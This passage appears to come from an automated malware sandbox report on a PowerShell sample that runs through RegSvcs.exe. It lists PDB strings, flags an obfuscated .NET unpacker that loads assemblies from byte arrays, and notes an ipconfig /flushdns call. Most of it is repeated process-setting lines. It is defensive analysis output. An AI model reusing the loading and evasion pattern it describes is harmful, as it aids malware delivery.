      Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp, WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Drawing.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Management.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbU source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?0oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Drawing.pdb` source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\mscorlib.pdb@ source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: mscorlib.pdbH source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.cs.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -Module-.cs.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341C00BD pushad ; iretd 0_2_00007FFD341C00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341C1B05 push eax; iretd 0_2_00007FFD341C1B5D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD341C1B5F push eax; iretd 0_2_00007FFD341C1B5D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05B777C4 push ds; retf 4_2_05B777C7

      Persistence and Installation Behavior

      barindex
      Uses ipconfig to lookup or modify the Windows network settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
